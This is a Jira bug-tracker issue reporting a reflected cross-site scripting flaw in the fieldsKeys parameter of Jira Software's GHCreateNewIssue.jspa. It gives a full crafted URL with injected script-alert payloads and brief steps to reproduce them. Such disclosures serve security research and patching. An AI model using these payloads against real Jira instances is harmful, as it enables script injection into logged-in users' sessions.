Uploaded image for project: 'Jira Software Data Center'
  1. Jira Software Data Center
  2. JSWSERVER-5575

XSS (reflected) in fieldsKeys parameter of GHCreateNewIssue.jspa

XMLWordPrintable

      Targets: https://test01.jira-dev.com/secure/GHCreateNewIssue.jspa?key=&issueType=7&fieldsKeys=priority,customfield_10006,summary,fixVersions,components,customfield_10005,assignee,customfield_10004,reporter,customfield_100039fd29<script>alert('XSS')</script>15d31825f8e9d6606&fieldsValues=1@%@ @%@XSS"><script>alert('XSS')</script>@%@-1@%@-1@%@1000@%@0@%@100@%@isecpartners@%@iSEC"><script>alert('XSS')</script>&forcedFieldsKeys=&forcedFieldsValues=&createNext=false&projectId=&decorator=none&selectedProjectId=10000&pageType=ChartBoard&subType=ArchiveChartBoard&type=ACB&selectedBoardId=-1&colPage=1
      Reproduction:
      After login open target URL in browser.
      Apply attack value "><script>alert('XSS')</script> in the fieldsKeys parameter.

              Unassigned Unassigned
              dblack David Black
              Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

                Created:
                Updated:
                Resolved: